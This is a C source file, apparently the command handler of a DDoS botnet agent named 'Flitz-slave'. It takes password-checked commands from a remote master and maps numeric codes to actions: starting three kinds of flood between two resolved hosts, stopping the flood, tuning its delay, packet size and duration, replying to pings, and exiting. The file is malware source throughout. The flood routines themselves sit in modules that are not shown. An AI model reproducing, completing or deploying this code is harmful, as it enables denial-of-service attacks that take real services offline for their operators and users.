


#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
#include "Flitz.h"
#include "Flitz-slave.h"
#include "dos.h"
#include "func.h"
#include "net.h"
#include "proc.h"



struct {
    short nr;
    void (*func)(unsigned long, char *);
} proc_type[] = {
    { 100, proc_100 },
    { 101, proc_101 },
    { 102, proc_102 },
    { 199, proc_199 },
    { 400, proc_400 },
    { 800, proc_800 },
    { 801, proc_801 },
    { 0, NULL }
};



void proc_100(unsigned long who, char *line)
{
    char *host1, *host2;
    unsigned long hos1, hos2;

    if ((host1 = func_chop(&line)) == NULL ||
        (host2 = func_chop(&line)) == NULL) {
        return;
    }

    hos1 = func_resolve(host1);
    hos2 = func_resolve(host2);

    if (hos1 != 0 && hos2 != 0) {
        dos_add(1, hos1, hos2, who);
    }
    return;
}



void proc_101(unsigned long who, char *line)
{
    char *host1, *host2;
    unsigned long hos1, hos2;

    if ((host1 = func_chop(&line)) == NULL ||
        (host2 = func_chop(&line)) == NULL) {
        return;
    }

    hos1 = func_resolve(host1);
    hos2 = func_resolve(host2);

    if (hos1 != 0 && hos2 != 0) {
        dos_add(2, hos1, hos2, who);
    }
    return;
}



void proc_102(unsigned long who, char *line)
{
    char *host1, *host2;
    unsigned long hos1, hos2;

    if ((host1 = func_chop(&line)) == NULL ||
        (host2 = func_chop(&line)) == NULL) {
        return;
    }

    hos1 = func_resolve(host1);
    hos2 = func_resolve(host2);

    if (hos1 != 0 && hos2 != 0) {
        dos_add(3, hos1, hos2, who);
    }
    return;
}



void proc_199(unsigned long who, char *line)
{
    net_send(who, "103\n");
    dos_del();
    return;
}



void proc_400(unsigned long who, char *line)
{
    char *arg1, *arg2, *arg3;

    if ((arg1 = func_chop(&line)) == NULL ||
        (arg2 = func_chop(&line)) == NULL ||
        (arg3 = func_chop(&line)) == NULL) {
        return;
    }

    setting.dos_delay = atoi(arg1);
    setting.dos_size = atoi(arg2);
    setting.dos_time = atoi(arg3);
    return;
}



void proc_800(unsigned long who, char *line)
{
    char *nr;
    char data[1024];

    if ((nr = func_chop(&line)) == NULL) {
        return;
    }

    snprintf(data, 1024, "100 %s\n", nr);
    net_send(who, data);
    return;
}



void proc_801(unsigned long who, char *line)
{
    exit(0);
}



void proc_line(unsigned long who, char *line)
{
    int i, n;
    char *num, *pass;

    func_rem_cr(&line);

    if ((num = func_chop(&line)) == NULL) {
        return;
    }

    if ((pass = func_chop(&line)) == NULL) {
        return;
    }

    if (func_scmp(pass, PASS_SLAVE) == 0) {
        return;
    }

    if (*num >= '0' && *num <= '9') {
        n = atoi(num);
        for (i = 0; proc_type[i].nr != 0; ++i) {
            if (proc_type[i].nr == n) {
                proc_type[i].func(who, line);
                return;
            }
        }
    }
    return;
}
